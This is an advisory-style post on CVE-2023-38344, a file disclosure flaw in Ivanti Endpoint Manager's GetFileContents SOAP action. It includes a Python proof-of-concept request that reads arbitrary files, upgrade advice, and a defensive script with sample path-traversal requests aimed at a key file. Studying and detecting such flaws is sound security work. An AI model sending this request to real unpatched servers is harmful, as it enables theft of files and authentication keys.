A recently discovered vulnerability (CVE-2023-38344) affects Ivanti Endpoint Manager versions before 2022 SU4. This vulnerability allows authenticated attackers to read arbitrary files from a remote system by exploiting a file disclosure flaw in the GetFileContents SOAP (Simple Object Access Protocol) action exposed via the /landesk/managementsuite/core/core.secure/OsdScript.asmx endpoint. One of the most critical aspects of this vulnerability is that it enables an attacker to access the private key used to authenticate remote access to agents, putting the entire system at risk.

Exploit Details

The vulnerability exists in the GetFileContents SOAP action, which does not sufficiently restrict the user-supplied file path. As a result, an authenticated attacker can read arbitrary files by sending a specially crafted request to the vulnerable endpoint with a file path pointing outside the directory the action is meant to serve.

Here's a sample code snippet demonstrating the exploitation:

import requests

# TARGET_SERVER is a placeholder for the Endpoint Manager core server
url = "https://TARGET_SERVER/landesk/managementsuite/core/core.secure/OsdScript.asmx"
headers = {
  "Content-Type": "text/xml; charset=utf-8",
  "SOAPAction": "http://tempuri.org/GetFileContents",
}

# Replace TARGET_FILE with the desired file you want to read;
# SAMPLE_SESSION_ID stands for a valid authenticated session
payload = """
<?xml version="1.0"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                 xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <GetFileContents xmlns="http://tempuri.org/">
      <session>SAMPLE_SESSION_ID</session>
      <file>TARGET_FILE</file>
    </GetFileContents>
  </soap12:Body>
</soap12:Envelope>
""".strip()  # strip() so the XML declaration is the first byte of the body

response = requests.post(url, data=payload, headers=headers)
print(response.text)

Important References

1. Ivanti Security Advisory
2. CVE-2023-38344 NVD Page

Mitigation

To mitigate this vulnerability, it is highly recommended to upgrade Ivanti Endpoint Manager to version 2022 SU4 or later. That release addresses the file disclosure vulnerability by properly restricting user-supplied paths.
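As an added illustration (not Ivanti's code and not part of the original post), the following shows what "properly restricting user-supplied paths" looks like as a check, and uses that same check to screen captured request bodies to the OsdScript.asmx endpoint for GetFileContents calls whose file parameter escapes the intended directory. The base directory, file names and sample request bodies are constructed placeholders.

```python
import os
import xml.etree.ElementTree as ET
TEMPURI_NS = "http://tempuri.org/"  # namespace of the GetFileContents call

def is_path_allowed(base_dir, requested):
    """True only if the client-supplied path stays inside base_dir: backslashes
    are normalised, absolute/drive-letter/UNC forms rejected, and realpath()
    collapses '..' before the prefix check, unlike a naive string compare."""
    norm = requested.replace("\\", "/")
    if norm.startswith("/") or ":" in norm:
        return False
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, norm))
    return os.path.commonpath([base, target]) == base

def extract_requested_file(soap_body):
    """<file> value of a GetFileContents call, or None if absent/not XML."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return None
    call = root.find(f".//{{{TEMPURI_NS}}}GetFileContents")
    if call is None:
        return None
    node = call.find(f"{{{TEMPURI_NS}}}file")
    return node.text if node is not None else None

def flag_requests(bodies, base_dir):
    """Paths from captured GetFileContents bodies that escape base_dir."""
    flagged = []
    for body in bodies:
        path = extract_requested_file(body)
        if path is not None and not is_path_allowed(base_dir, path):
            flagged.append(path)
    return flagged

def _soap_body(file_value):
    # Constructed request body in the shape the advisory's snippet uses.
    return (f'<?xml version="1.0"?><soap12:Envelope '
            f'xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"><soap12:Body>'
            f'<GetFileContents xmlns="{TEMPURI_NS}"><session>SAMPLE_SESSION_ID</session>'
            f'<file>{file_value}</file></GetFileContents></soap12:Body></soap12:Envelope>')

# Constructed samples: one legitimate script read and two attempts to reach a
# key file; the paths are placeholders, not real Endpoint Manager locations.
SAMPLE_BODIES = [_soap_body(p) for p in (
    "osd/build.ini", "..\\..\\..\\keys\\agent.key", "C:\\ProgramData\\keys\\agent.key")]
```

Running `flag_requests(SAMPLE_BODIES, "/opt/ldms/scripts")` returns only the two escaping paths; the same function can be fed request bodies from a reverse proxy or WAF log to spot probing of this endpoint on unpatched servers.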

Furthermore, organizations should consider implementing the principle of least privilege by limiting user access to critical files and monitoring any attempts to access sensitive information stored on remote systems.

Finally, consider implementing a comprehensive patch management policy to ensure software is up-to-date and protected against known vulnerabilities. This can help reduce the risk of exploitation and minimize the potential impact of security issues.

Conclusion

CVE-2023-38344 is a severe vulnerability affecting Ivanti Endpoint Manager before 2022 SU4. By exploiting this vulnerability, an authenticated attacker can read arbitrary files from a remote system, including sensitive data like the private key used for authentication. Organizations must take this vulnerability seriously and apply the appropriate updates and security measures to protect their environments.

Timeline

Published on: 09/21/2023 21:15:00 UTC
Last modified on: 09/25/2023 17:04:00 UTC